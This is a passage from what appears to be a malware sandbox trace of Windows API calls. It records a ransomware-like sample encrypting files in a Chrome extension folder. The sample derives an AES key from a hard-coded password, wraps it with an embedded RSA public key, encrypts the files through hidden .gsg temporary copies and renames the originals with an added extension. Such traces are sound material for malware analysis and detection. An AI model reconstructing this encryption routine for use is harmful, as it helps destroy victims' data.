Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\contentscript_bin_prod.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\contentscript_bin_prod.js")) returned 0x20 [0256.476] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\contentscript_bin_prod.js", dwFileAttributes=0x80) returned 1 [0256.476] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\contentscript_bin_prod.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\contentscript_bin_prod.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0256.477] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\contentscript_bin_prod.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\contentscript_bin_prod.js.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0256.478] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\contentscript_bin_prod.js.gsg", dwFileAttributes=0x2) returned 1 [0256.478] CryptAcquireContextA (in: phProv=0x2b9c38c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9c38c*=0x2e13cb8) returned 1 [0256.480] CryptCreateHash (in: hProv=0x2e13cb8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9c390 | out: phHash=0x2b9c390) returned 1 [0256.480] lstrlenA (lpString="hLvNwUTFLUnmKUEGuWxnlzzgzMlQm") returned 29 [0256.480] CryptHashData (hHash=0x2e186a8, pbData=0x28cb620, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0256.481] CryptDeriveKey (in: hProv=0x2e13cb8, Algid=0x6610, hBaseData=0x2e186a8, dwFlags=0x1000000, phKey=0x2b9c37c | out: phKey=0x2b9c37c*=0x2e18128) returned 1 [0256.481] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0256.481] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9c398, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374 | out: pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374) returned 1 [0256.481] CryptAcquireContextA (in: phProv=0x2b9c388, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9c388*=0x2e14070) returned 1 [0256.482] CryptImportPublicKeyInfo (in: hCryptProv=0x2e14070, dwCertEncodingType=0x1, pInfo=0x2e29e30*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e29e60*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e29e68*, PublicKey.cUnusedBits=0x0), phKey=0x2b9c380 | out: phKey=0x2b9c380*=0x2e191a8) returned 1 [0256.482] CryptEncrypt (in: hKey=0x2e191a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9c370*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9c370*=0x80) returned 1 [0256.482] CryptEncrypt (in: hKey=0x2e191a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e14290*, pdwDataLen=0x2b9c384*=0x18, dwBufLen=0x80 | out: pbData=0x2e14290*, pdwDataLen=0x2b9c384*=0x80) returned 1 [0256.482] WriteFile (in: hFile=0x5d64, lpBuffer=0x2e14290*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x2e14290*, lpNumberOfBytesWritten=0x2b9c394*=0x80, lpOverlapped=0x0) returned 1 [0256.483] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.485] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0256.485] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.487] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.487] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0256.487] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.487] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.487] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0256.487] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.488] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.488] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0256.488] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.488] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x303, lpOverlapped=0x0) returned 1 [0256.490] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x303, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x310) returned 1 [0256.490] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x310, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x310, lpOverlapped=0x0) returned 1 [0256.490] CloseHandle (hObject=0x5d50) returned 1 [0256.490] CloseHandle (hObject=0x5d64) returned 1 [0256.491] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\contentscript_bin_prod.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\contentscript_bin_prod.js.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\contentscript_bin_prod.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\contentscript_bin_prod.js"), bFailIfExists=0) returned 1 [0256.494] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\contentscript_bin_prod.js", dwFileAttributes=0x0) returned 1 [0256.495] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\contentscript_bin_prod.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\contentscript_bin_prod.js.gsg")) returned 1 [0256.496] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\contentscript_bin_prod.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\contentscript_bin_prod.js"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\contentscript_bin_prod.js.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\contentscript_bin_prod.js.fuck")) returned 1 [0256.498] CryptDestroyHash (hHash=0x2e186a8) returned 1 [0256.498] CryptDestroyKey (hKey=0x2e18128) returned 1 [0256.498] CryptReleaseContext (hProv=0x2e13cb8, dwFlags=0x0) returned 1 [0256.499] FindNextFileA (in: hFindFile=0x2e18828, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0256.499] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9d390 | out: lpSystemTimeAsFileTime=0x2b9d390) [0256.499] GetLastError () returned 0x0 [0256.499] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\dasherSettingSchema.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\dashersettingschema.json")) returned 0x20 [0256.499] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\dasherSettingSchema.json", dwFileAttributes=0x80) returned 1 [0256.500] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\dasherSettingSchema.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\dashersettingschema.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0256.500] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\dasherSettingSchema.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\dashersettingschema.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0256.502] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\dasherSettingSchema.json.gsg", dwFileAttributes=0x2) returned 1 [0256.503] CryptAcquireContextA (in: phProv=0x2b9c38c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9c38c*=0x2e13658) returned 1 [0256.505] CryptCreateHash (in: hProv=0x2e13658, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9c390 | out: phHash=0x2b9c390) returned 1 [0256.506] lstrlenA (lpString="hLvNwUTFLUnmKUEGuWxnlzzgzMlQm") returned 29 [0256.506] CryptHashData (hHash=0x2e180e8, pbData=0x28cb418, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0256.506] CryptDeriveKey (in: hProv=0x2e13658, Algid=0x6610, hBaseData=0x2e180e8, dwFlags=0x1000000, phKey=0x2b9c37c | out: phKey=0x2b9c37c*=0x2e18128) returned 1 [0256.506] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0256.506] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9c398, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374 | out: pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374) returned 1 [0256.506] CryptAcquireContextA (in: phProv=0x2b9c388, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9c388*=0x2e13dc8) returned 1 [0256.506] CryptImportPublicKeyInfo (in: hCryptProv=0x2e13dc8, dwCertEncodingType=0x1, pInfo=0x2e29610*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e29640*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e29648*, PublicKey.cUnusedBits=0x0), phKey=0x2b9c380 | out: phKey=0x2b9c380*=0x2e19868) returned 1 [0256.506] CryptEncrypt (in: hKey=0x2e19868, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9c370*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9c370*=0x80) returned 1 [0256.506] CryptEncrypt (in: hKey=0x2e19868, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e13768*, pdwDataLen=0x2b9c384*=0x18, dwBufLen=0x80 | out: pbData=0x2e13768*, pdwDataLen=0x2b9c384*=0x80) returned 1 [0256.507] WriteFile (in: hFile=0x5d50, lpBuffer=0x2e13768*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x2e13768*, lpNumberOfBytesWritten=0x2b9c394*=0x80, lpOverlapped=0x0) returned 1 [0256.508] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x356, lpOverlapped=0x0) returned 1 [0256.519] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x356, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x360) returned 1 [0256.519] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x360, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x360, lpOverlapped=0x0) returned 1 [0256.521] CloseHandle (hObject=0x5d64) returned 1 [0256.521] CloseHandle (hObject=0x5d50) returned 1 [0256.522] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\dasherSettingSchema.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\dashersettingschema.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\dasherSettingSchema.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\dashersettingschema.json"), bFailIfExists=0) returned 1 [0256.527] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\dasherSettingSchema.json", dwFileAttributes=0x0) returned 1 [0256.527] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\dasherSettingSchema.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\dashersettingschema.json.gsg")) returned 1 [0256.538] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\dasherSettingSchema.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\dashersettingschema.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\dasherSettingSchema.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\dashersettingschema.json.fuck")) returned 1 [0256.540] CryptDestroyHash (hHash=0x2e180e8) returned 1 [0256.540] CryptDestroyKey (hKey=0x2e18128) returned 1 [0256.540] CryptReleaseContext (hProv=0x2e13658, dwFlags=0x0) returned 1 [0256.540] FindNextFileA (in: hFindFile=0x2e18828, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0256.540] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9d390 | out: lpSystemTimeAsFileTime=0x2b9d390) [0256.540] GetLastError () returned 0x0 [0256.540] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\eventpage_bin_prod.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\eventpage_bin_prod.js")) returned 0x20 [0256.542] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\eventpage_bin_prod.js", dwFileAttributes=0x80) returned 1 [0256.542] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\eventpage_bin_prod.js" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\eventpage_bin_prod.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0256.543] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\eventpage_bin_prod.js.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\eventpage_bin_prod.js.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0256.554] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\eventpage_bin_prod.js.gsg", dwFileAttributes=0x2) returned 1 [0256.555] CryptAcquireContextA (in: phProv=0x2b9c38c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9c38c*=0x2e13e50) returned 1 [0256.557] CryptCreateHash (in: hProv=0x2e13e50, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9c390 | out: phHash=0x2b9c390) returned 1 [0256.557] lstrlenA (lpString="hLvNwUTFLUnmKUEGuWxnlzzgzMlQm") returned 29 [0256.558] CryptHashData (hHash=0x2e18128, pbData=0x28cb620, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0256.558] CryptDeriveKey (in: hProv=0x2e13e50, Algid=0x6610, hBaseData=0x2e18128, dwFlags=0x1000000, phKey=0x2b9c37c | out: phKey=0x2b9c37c*=0x2e186a8) returned 1 [0256.558] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0256.558] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9c398, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374 | out: pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374) returned 1 [0256.558] CryptAcquireContextA (in: phProv=0x2b9c388, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9c388*=0x2e140f8) returned 1 [0256.558] CryptImportPublicKeyInfo (in: hCryptProv=0x2e140f8, dwCertEncodingType=0x1, pInfo=0x2e29130*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2e29160*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2e29168*, PublicKey.cUnusedBits=0x0), phKey=0x2b9c380 | out: phKey=0x2b9c380*=0x2e19368) returned 1 [0256.558] CryptEncrypt (in: hKey=0x2e19368, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9c370*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9c370*=0x80) returned 1 [0256.559] CryptEncrypt (in: hKey=0x2e19368, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e13658*, pdwDataLen=0x2b9c384*=0x18, dwBufLen=0x80 | out: pbData=0x2e13658*, pdwDataLen=0x2b9c384*=0x80) returned 1 [0256.559] WriteFile (in: hFile=0x5d64, lpBuffer=0x2e13658*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x2e13658*, lpNumberOfBytesWritten=0x2b9c394*=0x80, lpOverlapped=0x0) returned 1 [0256.561] ReadFile (in: hFile=0x5d50, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0256.577] CryptEncrypt (in: hKey=0x2e186a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0256.577] WriteFile (in: hFile=0x5d64, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, 